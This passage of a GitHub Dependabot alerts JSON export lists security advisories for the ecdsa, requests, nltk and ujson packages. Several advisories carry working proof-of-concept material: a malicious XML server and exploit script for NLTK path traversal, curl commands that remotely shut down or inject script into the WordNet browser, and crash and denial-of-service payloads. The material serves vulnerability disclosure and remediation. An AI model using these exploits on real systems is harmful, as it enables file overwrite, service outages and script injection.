tag\n continue\n\n L = b[i + 1]\n if L >= 
0x80:\n # skip long-form lengths for simplicity\n continue\n\n max_possible = len(b) - (i + 2)\n if max_possible <= 10:\n continue\n\n # Claim more bytes than exist -> truncation\n newL = min(0x7F, max_possible + 20)\n b2 = bytearray(b)\n b2[i + 1] = newL\n\n try:\n SigningKey.from_der(bytes(b2))\n except Exception as e:\n return i, type(e).__name__, str(e)\n\n return None\n\n\nres = find_crashing_mutation(good)\nif res is None:\n print(\"[INFO] No exception triggered by this mutation strategy.\")\nelse:\n i, etype, msg = res\n print(\"[BUG] SigningKey.from_der raised unexpected exception type.\")\n print(\"Offset:\", i, \"Exception:\", etype, \"Message:\", msg)\n```\n\n- Expected: reject malformed DER with `UnexpectedDER` or `ValueError`\n- Actual: deterministically triggers an internal `IndexError` (DoS risk)\n- Example output:\n```\nResult: (5, 'IndexError', 'index out of bounds on dimension 1')\n```\n\n## Suggested fix\n\nAdd “declared length must fit buffer” checks in DER helper functions similarly to the existing check in `remove_sequence()`:\n\n- `remove_octet_string()`\n- `remove_constructed()`\n- `remove_implicit()`\n\nAdditionally, consider catching unexpected internal exceptions in DER key parsing paths and re-raising them as `UnexpectedDER` to avoid crashy failure modes.\n\n## Credit\n\nMohamed Abdelaal 
(@0xmrma)","severity":"medium","identifiers":[{"value":"GHSA-9f5j-8jwj-x28g","type":"GHSA"},{"value":"CVE-2026-33936","type":"CVE"}],"references":[{"url":"https://github.com/tlsfuzzer/python-ecdsa/security/advisories/GHSA-9f5j-8jwj-x28g"},{"url":"https://github.com/tlsfuzzer/python-ecdsa/commit/bd66899550d7185939bf27b75713a2ac9325a9d3"},{"url":"https://github.com/tlsfuzzer/python-ecdsa/releases/tag/python-ecdsa-0.19.2"},{"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-33936"},{"url":"https://github.com/advisories/GHSA-9f5j-8jwj-x28g"}],"published_at":"2026-03-27T15:56:01Z","updated_at":"2026-03-30T20:17:12Z","withdrawn_at":null,"vulnerabilities":[{"package":{"ecosystem":"pip","name":"ecdsa"},"severity":"medium","vulnerable_version_range":"< 0.19.2","first_patched_version":{"identifier":"0.19.2"}}],"cvss_severities":{"cvss_v3":{"vector_string":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L","score":5.3},"cvss_v4":{"vector_string":null,"score":0.0}},"epss":{"percentage":0.00053,"percentile":0.16595},"cvss":{"vector_string":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L","score":5.3},"cwes":[{"cwe_id":"CWE-20","name":"Improper Input Validation"},{"cwe_id":"CWE-130","name":"Improper Handling of Length Parameter Inconsistency"}],"classification":"general"},"security_vulnerability":{"package":{"ecosystem":"pip","name":"ecdsa"},"severity":"medium","vulnerable_version_range":"< 
0.19.2","first_patched_version":{"identifier":"0.19.2"}},"url":"https://api.github.com/repos/Fearvox/EverOS/dependabot/alerts/101","html_url":"https://github.com/Fearvox/EverOS/security/dependabot/101","created_at":"2026-05-13T05:27:16Z","updated_at":"2026-05-13T05:27:16Z","dismissal_request":null,"assignees":[],"dismissed_at":null,"dismissed_by":null,"dismissed_reason":null,"dismissed_comment":null,"fixed_at":null,"auto_dismissed_at":null},{"number":100,"state":"open","dependency":{"package":{"ecosystem":"pip","name":"requests"},"manifest_path":"methods/EverCore/uv.lock","scope":"development","relationship":"direct"},"security_advisory":{"ghsa_id":"GHSA-gc5v-m9x4-r6x2","cve_id":"CVE-2026-25645","summary":"Requests has Insecure Temp File Reuse in its extract_zipped_paths() utility function","description":"### Impact\nThe `requests.utils.extract_zipped_paths()` utility function uses a predictable filename when extracting files from zip archives into the system temporary directory. If the target file already exists, it is reused without validation. 
A local attacker with write access to the temp directory could pre-create a malicious file that would be loaded in place of the legitimate one.\n\n### Affected usages\n**Standard usage of the Requests library is not affected by this vulnerability.** Only applications that call `extract_zipped_paths()` directly are impacted.\n\n### Remediation\nUpgrade to at least Requests 2.33.0, where the library now extracts files to a non-deterministic location.\n\nIf developers are unable to upgrade, they can set `TMPDIR` in their environment to a directory with restricted write access.","severity":"medium","identifiers":[{"value":"GHSA-gc5v-m9x4-r6x2","type":"GHSA"},{"value":"CVE-2026-25645","type":"CVE"}],"references":[{"url":"https://github.com/psf/requests/security/advisories/GHSA-gc5v-m9x4-r6x2"},{"url":"https://github.com/psf/requests/commit/66d21cb07bd6255b1280291c4fafb71803cdb3b7"},{"url":"https://github.com/psf/requests/releases/tag/v2.33.0"},{"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-25645"},{"url":"https://github.com/advisories/GHSA-gc5v-m9x4-r6x2"}],"published_at":"2026-03-25T16:56:28Z","updated_at":"2026-03-27T22:07:43Z","withdrawn_at":null,"vulnerabilities":[{"package":{"ecosystem":"pip","name":"requests"},"severity":"medium","vulnerable_version_range":"< 2.33.0","first_patched_version":{"identifier":"2.33.0"}}],"cvss_severities":{"cvss_v3":{"vector_string":"CVSS:3.1/AV:L/AC:H/PR:L/UI:R/S:U/C:N/I:H/A:N","score":4.4},"cvss_v4":{"vector_string":null,"score":0.0}},"epss":{"percentage":5.0e-05,"percentile":0.00243},"cvss":{"vector_string":"CVSS:3.1/AV:L/AC:H/PR:L/UI:R/S:U/C:N/I:H/A:N","score":4.4},"cwes":[{"cwe_id":"CWE-377","name":"Insecure Temporary File"}],"classification":"general"},"security_vulnerability":{"package":{"ecosystem":"pip","name":"requests"},"severity":"medium","vulnerable_version_range":"< 
2.33.0","first_patched_version":{"identifier":"2.33.0"}},"url":"https://api.github.com/repos/Fearvox/EverOS/dependabot/alerts/100","html_url":"https://github.com/Fearvox/EverOS/security/dependabot/100","created_at":"2026-05-13T05:27:15Z","updated_at":"2026-05-13T05:27:15Z","dismissal_request":null,"assignees":[],"dismissed_at":null,"dismissed_by":null,"dismissed_reason":null,"dismissed_comment":null,"fixed_at":null,"auto_dismissed_at":null},{"number":99,"state":"open","dependency":{"package":{"ecosystem":"pip","name":"nltk"},"manifest_path":"methods/EverCore/uv.lock","scope":"runtime","relationship":"direct"},"security_advisory":{"ghsa_id":"GHSA-469j-vmhf-r6v7","cve_id":"CVE-2026-33236","summary":"NLTK has a Downloader Path Traversal Vulnerability (AFO) - Arbitrary File Overwrite","description":"## Vulnerability Description\n\nThe NLTK downloader does not validate the `subdir` and `id` attributes when processing remote XML index files. Attackers can control a remote XML index server to provide malicious values containing path traversal sequences (such as `../`), which can lead to:\n\n1. **Arbitrary Directory Creation**: Create directories at arbitrary locations in the file system\n2. **Arbitrary File Creation**: Create arbitrary files\n3. **Arbitrary File Overwrite**: Overwrite critical system files (such as `/etc/passwd`, `~/.ssh/authorized_keys`, etc.)\n\n## Vulnerability Principle\n\n### Key Code Locations\n\n**1. XML Parsing Without Validation** (`nltk/downloader.py:253`)\n```python\nself.filename = os.path.join(subdir, id + ext)\n```\n- `subdir` and `id` are directly from XML attributes without any validation\n\n**2. Path Construction Without Checks** (`nltk/downloader.py:679`)\n```python\nfilepath = os.path.join(download_dir, info.filename)\n```\n- Directly uses `filename` which may contain path traversal\n\n**3. 
Unrestricted Directory Creation** (`nltk/downloader.py:687`)\n```python\nos.makedirs(os.path.join(download_dir, info.subdir), exist_ok=True)\n```\n- Can create arbitrary directories outside the download directory\n\n**4. File Writing Without Protection** (`nltk/downloader.py:695`)\n```python\nwith open(filepath, \"wb\") as outfile:\n```\n- Can write to arbitrary locations in the file system\n\n### Attack Chain\n\n```\n1. Attacker controls remote XML index server\n ↓\n2. Provides malicious XML: \n ↓\n3. Victim executes: downloader.download('passwd')\n ↓\n4. Package.fromxml() creates object, filename = \"../../etc/passwd.zip\"\n ↓\n5. _download_package() constructs path: download_dir + \"../../etc/passwd.zip\"\n ↓\n6. os.makedirs() creates directory: download_dir + \"../../etc\"\n ↓\n7. open(filepath, \"wb\") writes file to /etc/passwd.zip\n ↓\n8. System file is overwritten!\n```\n\n## Impact Scope\n1. **System File Overwrite**\n\n## Reproduction Steps\n\n### Environment Setup\n\n1. Install NLTK\n```bash\npip install nltk\n```\n\n2. 
Prepare malicious server and exploit script (see PoC section)\n\n### Reproduction Process\n\n**Step 1: Start malicious server**\n```bash\npython3 malicious_server.py\n```\n\n**Step 2: Run exploit script**\n```bash\npython3 exploit_vulnerability.py\n```\n\n**Step 3: Verify results**\n```bash\nls -la /tmp/test_file.zip\n```\n\n## Proof of Concept\n\n### Malicious Server (malicious_server.py)\n\n```python\n#!/usr/bin/env python3\n\"\"\"Malicious HTTP Server - Provides XML index with path traversal\"\"\"\nimport os\nimport tempfile\nimport zipfile\nfrom http.server import HTTPServer, BaseHTTPRequestHandler\n\n# Create temporary directory\nserver_dir = tempfile.mkdtemp(prefix=\"nltk_malicious_\")\n\n# Create malicious XML (contains path traversal)\nmalicious_xml = \"\"\"\n\n \n \n \n\n\"\"\"\n\n# Save files\nwith open(os.path.join(server_dir, \"malicious_index.xml\"), \"w\") as f:\n f.write(malicious_xml)\n\nwith zipfile.ZipFile(os.path.join(server_dir, \"test.zip\"), \"w\") as zf:\n zf.writestr(\"test.txt\", \"Path traversal attack!\")\n\n# HTTP Handler\nclass Handler(BaseHTTPRequestHandler):\n def do_GET(self):\n if self.path == '/malicious_index.xml':\n self.send_response(200)\n self.send_header('Content-type', 'application/xml')\n self.end_headers()\n with open(os.path.join(server_dir, 'malicious_index.xml'), 'rb') as f:\n self.wfile.write(f.read())\n elif self.path == '/test.zip':\n self.send_response(200)\n self.send_header('Content-type', 'application/zip')\n self.end_headers()\n with open(os.path.join(server_dir, 'test.zip'), 'rb') as f:\n self.wfile.write(f.read())\n else:\n self.send_response(404)\n self.end_headers()\n \n def log_message(self, format, *args):\n pass\n\n# Start server\nif __name__ == \"__main__\":\n port = 8888\n server = HTTPServer((\"0.0.0.0\", port), Handler)\n print(f\"Malicious server started: http://127.0.0.1:{port}/malicious_index.xml\")\n print(\"Press Ctrl+C to stop\")\n try:\n server.serve_forever()\n except KeyboardInterrupt:\n 
print(\"\\nServer stopped\")\n```\n\n### Exploit Script (exploit_vulnerability.py)\n\n```python\n#!/usr/bin/env python3\n\"\"\"AFO Vulnerability Exploit Script\"\"\"\nimport os\nimport tempfile\n\ndef exploit(server_url=\"http://127.0.0.1:8888/malicious_index.xml\"):\n download_dir = tempfile.mkdtemp(prefix=\"nltk_exploit_\")\n print(f\"Download directory: {download_dir}\")\n \n # Exploit vulnerability\n from nltk.downloader import Downloader\n downloader = Downloader(server_index_url=server_url, download_dir=download_dir)\n downloader.download(\"test_file\", quiet=True)\n \n # Check results\n expected_path = \"/tmp/test_file.zip\"\n if os.path.exists(expected_path):\n print(f\"\\n✗ Exploit successful! File written to: {expected_path}\")\n print(f\"✗ Path traversal attack successful!\")\n else:\n print(f\"\\n? File not found, download may have failed\")\n\nif __name__ == \"__main__\":\n exploit()\n```\n\n### Execution Results\n\n```\n✗ Exploit successful! File written to: /tmp/test_file.zip\n✗ Path traversal attack successful!\n```","severity":"high","identifiers":[{"value":"GHSA-469j-vmhf-r6v7","type":"GHSA"},{"value":"CVE-2026-33236","type":"CVE"}],"references":[{"url":"https://github.com/nltk/nltk/security/advisories/GHSA-469j-vmhf-r6v7"},{"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-33236"},{"url":"https://github.com/nltk/nltk/commit/89fe2ec2c6bae6e2e7a46dad65cc34231976ed8a"},{"url":"https://github.com/advisories/GHSA-469j-vmhf-r6v7"}],"published_at":"2026-03-19T12:42:42Z","updated_at":"2026-03-25T18:21:28Z","withdrawn_at":null,"vulnerabilities":[{"package":{"ecosystem":"pip","name":"nltk"},"severity":"high","vulnerable_version_range":"<= 
3.9.2","first_patched_version":null}],"cvss_severities":{"cvss_v3":{"vector_string":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:H","score":8.1},"cvss_v4":{"vector_string":null,"score":0.0}},"epss":{"percentage":0.00019,"percentile":0.0532},"cvss":{"vector_string":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:H","score":8.1},"cwes":[{"cwe_id":"CWE-22","name":"Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')"}],"classification":"general"},"security_vulnerability":{"package":{"ecosystem":"pip","name":"nltk"},"severity":"high","vulnerable_version_range":"<= 3.9.2","first_patched_version":null},"url":"https://api.github.com/repos/Fearvox/EverOS/dependabot/alerts/99","html_url":"https://github.com/Fearvox/EverOS/security/dependabot/99","created_at":"2026-05-13T05:27:15Z","updated_at":"2026-05-13T05:27:15Z","dismissal_request":null,"assignees":[],"dismissed_at":null,"dismissed_by":null,"dismissed_reason":null,"dismissed_comment":null,"fixed_at":null,"auto_dismissed_at":null},{"number":98,"state":"open","dependency":{"package":{"ecosystem":"pip","name":"nltk"},"manifest_path":"methods/EverCore/uv.lock","scope":"runtime","relationship":"direct"},"security_advisory":{"ghsa_id":"GHSA-jm6w-m3j8-898g","cve_id":"CVE-2026-33231","summary":"Unauthenticated remote shutdown in nltk.app.wordnet_app","description":"### Summary\n`nltk.app.wordnet_app` allows unauthenticated remote shutdown of the local WordNet Browser HTTP server when it is started in its default mode. 
A simple `GET /SHUTDOWN%20THE%20SERVER` request causes the process to terminate immediately via `os._exit(0)`, resulting in a denial of service.\n\n### Details\nThe vulnerable logic is in `nltk/app/wordnet_app.py`:\n\n- [`nltk/app/wordnet_app.py:242`](/mnt/Data/my_brains/test/nltk/nltk/app/wordnet_app.py#L242)\n - The server listens on all interfaces:\n - `server = HTTPServer((\"\", port), MyServerHandler)`\n\n- [`nltk/app/wordnet_app.py:87`](/mnt/Data/my_brains/test/nltk/nltk/app/wordnet_app.py#L87)\n - Incoming requests are checked for the exact path:\n - `if unquote_plus(sp) == \"SHUTDOWN THE SERVER\":`\n\n- [`nltk/app/wordnet_app.py:88`](/mnt/Data/my_brains/test/nltk/nltk/app/wordnet_app.py#L88)\n - The shutdown protection only depends on `server_mode`\n\n- [`nltk/app/wordnet_app.py:93`](/mnt/Data/my_brains/test/nltk/nltk/app/wordnet_app.py#L93)\n - In the default mode (`runBrowser=True`, therefore `server_mode=False`), the handler terminates the process directly:\n - `os._exit(0)`\n\nThis means any party that can reach the listening port can stop the service with a single unauthenticated GET request when the browser is started in its normal mode.\n\n### PoC\n1. Start the WordNet Browser in Docker in its default mode:\n\n```bash\ndocker run -d --name nltk-wordnet-web-default-retest -p 8004:8004 \\\n nltk-sandbox \\\n python -c \"import nltk; nltk.download('wordnet', quiet=True); from nltk.app.wordnet_app import wnb; wnb(8004, True)\"\n```\n\n2. Confirm the service is reachable:\n\n```bash\ncurl -s -o /tmp/wn_before.html -w '%{http_code}\\n' 'http://127.0.0.1:8004/'\n```\n\nObserved result:\n\n```text\n200\n```\n\n3. Trigger shutdown:\n\n```bash\ncurl -s -o /tmp/wn_shutdown.html -w '%{http_code}\\n' 'http://127.0.0.1:8004/SHUTDOWN%20THE%20SERVER'\n```\n\nObserved result:\n\n```text\n000\n```\n\n4. 
Verify the service is no longer available:\n\n```bash\ncurl -s -o /tmp/wn_after.html -w '%{http_code}\\n' 'http://127.0.0.1:8004/'\ndocker ps -a --filter name=nltk-wordnet-web-default-retest --format '{{.Names}}\\t{{.Status}}'\ndocker logs nltk-wordnet-web-default-retest\n```\n\nObserved results:\n\n```text\n000\nnltk-wordnet-web-default-retest Exited (0)\nServer shutting down!\n```\n\n### Impact\nThis is an unauthenticated denial-of-service issue in the NLTK WordNet Browser HTTP server.\n\nAny reachable client can terminate the service remotely when the application is started in its default mode. The impact is limited to service availability, but it is still security-relevant because:\n\n- the route is accessible over HTTP\n- no authentication or CSRF-style confirmation is required\n- the server listens on all interfaces by default\n- the process exits immediately instead of performing a controlled shutdown\n\nThis primarily affects users who run `nltk.app.wordnet_app` and expose or otherwise allow access to its listening port.","severity":"high","identifiers":[{"value":"GHSA-jm6w-m3j8-898g","type":"GHSA"},{"value":"CVE-2026-33231","type":"CVE"}],"references":[{"url":"https://github.com/nltk/nltk/security/advisories/GHSA-jm6w-m3j8-898g"},{"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-33231"},{"url":"https://github.com/nltk/nltk/commit/bbaae83db86a0f49e00f5b0db44a7254c268de9b"},{"url":"https://github.com/advisories/GHSA-jm6w-m3j8-898g"}],"published_at":"2026-03-19T12:42:20Z","updated_at":"2026-04-25T01:23:11Z","withdrawn_at":null,"vulnerabilities":[{"package":{"ecosystem":"pip","name":"nltk"},"severity":"high","vulnerable_version_range":"<= 
3.9.3","first_patched_version":{"identifier":"3.9.4"}}],"cvss_severities":{"cvss_v3":{"vector_string":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H","score":7.5},"cvss_v4":{"vector_string":null,"score":0.0}},"epss":{"percentage":0.00019,"percentile":0.05214},"cvss":{"vector_string":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H","score":7.5},"cwes":[{"cwe_id":"CWE-306","name":"Missing Authentication for Critical Function"}],"classification":"general"},"security_vulnerability":{"package":{"ecosystem":"pip","name":"nltk"},"severity":"high","vulnerable_version_range":"<= 3.9.3","first_patched_version":{"identifier":"3.9.4"}},"url":"https://api.github.com/repos/Fearvox/EverOS/dependabot/alerts/98","html_url":"https://github.com/Fearvox/EverOS/security/dependabot/98","created_at":"2026-05-13T05:27:15Z","updated_at":"2026-05-13T05:27:15Z","dismissal_request":null,"assignees":[],"dismissed_at":null,"dismissed_by":null,"dismissed_reason":null,"dismissed_comment":null,"fixed_at":null,"auto_dismissed_at":null},{"number":97,"state":"open","dependency":{"package":{"ecosystem":"pip","name":"nltk"},"manifest_path":"methods/EverCore/uv.lock","scope":"runtime","relationship":"direct"},"security_advisory":{"ghsa_id":"GHSA-gfwx-w7gr-fvh7","cve_id":"CVE-2026-33230","summary":"Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') in nltk","description":"### Summary\n`nltk.app.wordnet_app` contains a reflected cross-site scripting issue in the `lookup_...` route. A crafted `lookup_` URL can inject arbitrary HTML/JavaScript into the response page because attacker-controlled `word` data is reflected into HTML without escaping. 
This impacts users running the local WordNet Browser server and can lead to script execution in the browser origin of that application.\n\n### Details\nThe vulnerable flow is in `nltk/app/wordnet_app.py`:\n\n- [`nltk/app/wordnet_app.py:144`](/mnt/Data/my_brains/test/nltk/nltk/app/wordnet_app.py#L144)\n - Requests starting with `lookup_` are handled as HTML responses:\n - `page, word = page_from_href(sp)`\n\n- [`nltk/app/wordnet_app.py:755`](/mnt/Data/my_brains/test/nltk/nltk/app/wordnet_app.py#L755)\n - `page_from_href()` calls `page_from_reference(Reference.decode(href))`\n\n- [`nltk/app/wordnet_app.py:769`](/mnt/Data/my_brains/test/nltk/nltk/app/wordnet_app.py#L769)\n - `word = href.word`\n\n- [`nltk/app/wordnet_app.py:796`](/mnt/Data/my_brains/test/nltk/nltk/app/wordnet_app.py#L796)\n - If no results are found, `word` is inserted directly into the HTML body:\n - `body = \"The word or words '%s' were not found in the dictionary.\" % word`\n\nThis is inconsistent with the `search` route, which does escape user input:\n\n- [`nltk/app/wordnet_app.py:136`](/mnt/Data/my_brains/test/nltk/nltk/app/wordnet_app.py#L136)\n - `word = html.escape(...)`\n\nAs a result, a malicious `lookup_...` payload can inject script into the response page.\n\nThe issue is exploitable because:\n\n- `Reference.decode()` accepts attacker-controlled base64-encoded pickle data for the URL state.\n- The decoded `word` is reflected into HTML without `html.escape()`.\n- The server is started with `HTTPServer((\"\", port), MyServerHandler)`, so it listens on all interfaces by default, not just `localhost`.\n\n### PoC\n1. Start the WordNet Browser in an isolated Docker environment:\n\n```bash\ndocker run -d --name nltk-wordnet-web -p 8002:8002 \\\n nltk-sandbox \\\n python -c \"import nltk; nltk.download('wordnet', quiet=True); from nltk.app.wordnet_app import wnb; wnb(8002, False)\"\n```\n\n2. 
Use the following crafted payload, which decodes to:\n\n```python\n(\"\", {})\n```\n\nEncoded payload:\n\n```text\ngAWVIQAAAAAAAACMGTxzY3JpcHQ-YWxlcnQoMSk8L3NjcmlwdD6UfZSGlC4=\n```\n\n3. Request the vulnerable route:\n\n```bash\ncurl -s \"http://127.0.0.1:8002/lookup_gAWVIQAAAAAAAACMGTxzY3JpcHQ-YWxlcnQoMSk8L3NjcmlwdD6UfZSGlC4=\"\n```\n\n4. Observed result:\n\n```text\nThe word or words '' were not found in the dictionary.\n```\n\"127\"\n\n\nI also validated the issue directly at function level in Docker:\n\n```python\nimport base64\nimport pickle\n\nfrom nltk.app.wordnet_app import page_from_href\n\npayload = base64.urlsafe_b64encode(\n pickle.dumps((\"\", {}), -1)\n).decode()\n\npage, word = page_from_href(payload)\nprint(word)\nprint(\"\" in page)\n```\n\nObserved output:\n\n```text\nWORD= \nHAS_SCRIPT= True\n```\n\n### Impact\nThis is a reflected XSS issue in the NLTK WordNet Browser web UI.\n\nAn attacker who can convince a user to open a crafted `lookup_...` URL can execute arbitrary JavaScript in the origin of the local WordNet Browser application. 
This can be used to:\n\n- run arbitrary script in the browser tab\n- manipulate the page content shown to the user\n- issue same-origin requests to other WordNet Browser routes\n- potentially trigger available UI actions in that local app context\n\nThis primarily impacts users who run `nltk.app.wordnet_app` as a local or self-hosted HTTP service and open attacker-controlled links.","severity":"medium","identifiers":[{"value":"GHSA-gfwx-w7gr-fvh7","type":"GHSA"},{"value":"CVE-2026-33230","type":"CVE"}],"references":[{"url":"https://github.com/nltk/nltk/security/advisories/GHSA-gfwx-w7gr-fvh7"},{"url":"https://github.com/nltk/nltk/commit/1c3f799607eeb088cab2491dcf806ae83c29ad8f"},{"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-33230"},{"url":"https://github.com/nltk/nltk/commit/40d0bc1d484a3458d6a63ecb5ba4957ab16ba14e"},{"url":"https://github.com/advisories/GHSA-gfwx-w7gr-fvh7"}],"published_at":"2026-03-18T20:23:33Z","updated_at":"2026-03-25T18:21:03Z","withdrawn_at":null,"vulnerabilities":[{"package":{"ecosystem":"pip","name":"nltk"},"severity":"medium","vulnerable_version_range":"<= 3.9.3","first_patched_version":{"identifier":"3.9.4"}}],"cvss_severities":{"cvss_v3":{"vector_string":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N","score":6.1},"cvss_v4":{"vector_string":null,"score":0.0}},"epss":{"percentage":0.00017,"percentile":0.04074},"cvss":{"vector_string":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N","score":6.1},"cwes":[{"cwe_id":"CWE-79","name":"Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')"}],"classification":"general"},"security_vulnerability":{"package":{"ecosystem":"pip","name":"nltk"},"severity":"medium","vulnerable_version_range":"<= 
3.9.3","first_patched_version":{"identifier":"3.9.4"}},"url":"https://api.github.com/repos/Fearvox/EverOS/dependabot/alerts/97","html_url":"https://github.com/Fearvox/EverOS/security/dependabot/97","created_at":"2026-05-13T05:27:15Z","updated_at":"2026-05-13T05:27:15Z","dismissal_request":null,"assignees":[],"dismissed_at":null,"dismissed_by":null,"dismissed_reason":null,"dismissed_comment":null,"fixed_at":null,"auto_dismissed_at":null},{"number":96,"state":"open","dependency":{"package":{"ecosystem":"pip","name":"nltk"},"manifest_path":"methods/EverCore/uv.lock","scope":"runtime","relationship":"direct"},"security_advisory":{"ghsa_id":"GHSA-rf74-v2fm-23pw","cve_id":null,"summary":"Natural Language Toolkit (NLTK) has unbounded recursion in JSONTaggedDecoder.decode_obj() may cause DoS","description":"### Summary\n`JSONTaggedDecoder.decode_obj()` in `nltk/jsontags.py` calls itself \nrecursively without any depth limit. A deeply nested JSON structure \nexceeding `sys.getrecursionlimit()` (default: 1000) will raise an \nunhandled `RecursionError`, crashing the Python process.\n\n### Affected code\nFile: `nltk/jsontags.py`, lines 47–52\n```python\n@classmethod\ndef decode_obj(cls, obj):\n if isinstance(obj, dict):\n obj = {key: cls.decode_obj(val) for (key, val) in obj.items()}\n elif isinstance(obj, list):\n obj = list(cls.decode_obj(val) for val in obj)\n```\n\n### Proof of Concept\n```python\nimport sys, json\nfrom nltk.jsontags import JSONTaggedDecoder\n\ndepth = sys.getrecursionlimit() + 50 # e.g. 1050\npayload = '{\"x\":' * depth + \"null\" + \"}\" * depth\n\n# Raises RecursionError, crashing the process\njson.loads(payload, cls=JSONTaggedDecoder)\n```\n\n### Impact\nAny code path that passes externally-supplied JSON to \n`JSONTaggedDecoder` is vulnerable to denial of service.\nThe severity depends on whether such a path exists in the \ncalling code (e.g. 
`nltk/data.py`).\n\n### Suggested Fix\nAdd a depth parameter with a hard limit:\n```python\n@classmethod\ndef decode_obj(cls, obj, _depth=0):\n if _depth > 100:\n raise ValueError(\"JSON nesting too deep\")\n if isinstance(obj, dict):\n obj = {key: cls.decode_obj(val, _depth + 1) \n for (key, val) in obj.items()}\n elif isinstance(obj, list):\n obj = list(cls.decode_obj(val, _depth + 1) for val in obj)\n```","severity":"medium","identifiers":[{"value":"GHSA-rf74-v2fm-23pw","type":"GHSA"}],"references":[{"url":"https://github.com/nltk/nltk/security/advisories/GHSA-rf74-v2fm-23pw"},{"url":"https://github.com/advisories/GHSA-rf74-v2fm-23pw"}],"published_at":"2026-03-18T20:17:43Z","updated_at":"2026-03-18T20:17:44Z","withdrawn_at":null,"vulnerabilities":[{"package":{"ecosystem":"pip","name":"nltk"},"severity":"medium","vulnerable_version_range":"<= 3.9.3","first_patched_version":null}],"cvss_severities":{"cvss_v3":{"vector_string":null,"score":0.0},"cvss_v4":{"vector_string":"CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N","score":5.1}},"cvss":{"vector_string":null,"score":0.0},"cwes":[{"cwe_id":"CWE-674","name":"Uncontrolled Recursion"}],"classification":"general"},"security_vulnerability":{"package":{"ecosystem":"pip","name":"nltk"},"severity":"medium","vulnerable_version_range":"<= 
3.9.3","first_patched_version":null},"url":"https://api.github.com/repos/Fearvox/EverOS/dependabot/alerts/96","html_url":"https://github.com/Fearvox/EverOS/security/dependabot/96","created_at":"2026-05-13T05:27:15Z","updated_at":"2026-05-13T05:27:15Z","dismissal_request":null,"assignees":[],"dismissed_at":null,"dismissed_by":null,"dismissed_reason":null,"dismissed_comment":null,"fixed_at":null,"auto_dismissed_at":null},{"number":95,"state":"open","dependency":{"package":{"ecosystem":"pip","name":"ujson"},"manifest_path":"methods/EverCore/uv.lock","scope":"runtime","relationship":"transitive"},"security_advisory":{"ghsa_id":"GHSA-c8rr-9gxc-jprv","cve_id":"CVE-2026-32875","summary":"UltraJSON has an integer overflow handling large indent leads to buffer overflow or infinite loop","description":"### Summary\n\n`ujson.dumps()` crashes the Python interpreter (segmentation fault) when the product of the `indent` parameter and the nested depth of the input exceeds INT32_MAX. It can also get stuck in an infinite loop if the `indent` is a large negative number. Both are caused by an integer overflow/underflow whilst calculating how much memory to reserve for indentation. And both can be used to achieve denial of service.\n\n(Note: A negative indent to `ujson` means add spaces after colons but do not add line breaks or indentation. It is unclear to the current maintainers whether this was ever even an intended feature or just a byproduct of the way it was written.)\n\n### Exploitability\n\nTo be vulnerable, a service must call `ujson.dump()`/`ujson.dumps()`/`ujson.encode()` whilst giving untrusted users control over the `indent` parameter and not restrict that indentation to reasonably small non-negative values. 
(Even with the fix for this vulnerability, such usage is strongly advised against since even a bug-free JSON serialiser would be vulnerable to denial of service simply by the attacker requesting indents that have the server needlessly filling out gigabytes of whitespace.)\n\nA service may also be vulnerable to the infinite loop if it uses a fixed _negative_ `indent`. An underflow always occurs for any negative indent when the input data is at least one level nested but, for small negative indents, the underflow is usually accidentally rectified by another overflow. As far as the maintainers are aware, the infinite loop can not be reached for indentations from -1 to -65536 / max_recursion_depth_as_limited_by_stack_size but users of negative indents are encouraged to consider their service affected even if the infinite loop seems unreachable.\n\n### Example\n\n```python\nimport ujson\n\ndef example(depth, indent):\n a = [0]\n for i in range(1000):\n a = [a]\n ujson.dumps(a, indent=indent)\n\nexample(1, 2**30) # segfault\nexample(1000, -200) # infinite loop\n```\n\n### Patches\n\nujson 5.12.0, containing 486bd4553dc471a1de11613bc7347a6b318e37ea, promotes the integer types where the overflow occurred, skips the indentation code path for negative indent (which was supposed to be a no-op) and places an artificial cap of 1000 on the `indent` parameter.\n\n### Workarounds\n\nUsers who don't wish to upgrade can either use a fixed indentation, no indentation or ensure indentation is non-negative and not enormous (below `2**31 / max_recursion_depth_as_limited_by_stack_size`).\n\n### References\n\nThe original bug report can be found at https://github.com/ultrajson/ultrajson/issues/700\n\nThis issue was independently discovered by @coco1629, @EthanKim88 and 
@vmfunc.","severity":"high","identifiers":[{"value":"GHSA-c8rr-9gxc-jprv","type":"GHSA"},{"value":"CVE-2026-32875","type":"CVE"}],"references":[{"url":"https://github.com/ultrajson/ultrajson/security/advisories/GHSA-c8rr-9gxc-jprv"},{"url":"https://github.com/ultrajson/ultrajson/issues/700"},{"url":"https://github.com/ultrajson/ultrajson/commit/486bd4553dc471a1de11613bc7347a6b318e37ea"},{"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-32875"},{"url":"https://github.com/advisories/GHSA-c8rr-9gxc-jprv"}],"published_at":"2026-03-18T13:01:24Z","updated_at":"2026-03-20T21:19:57Z","withdrawn_at":null,"vulnerabilities":[{"package":{"ecosystem":"pip","name":"ujson"},"severity":"high","vulnerable_version_range":">= 5.1.0, <= 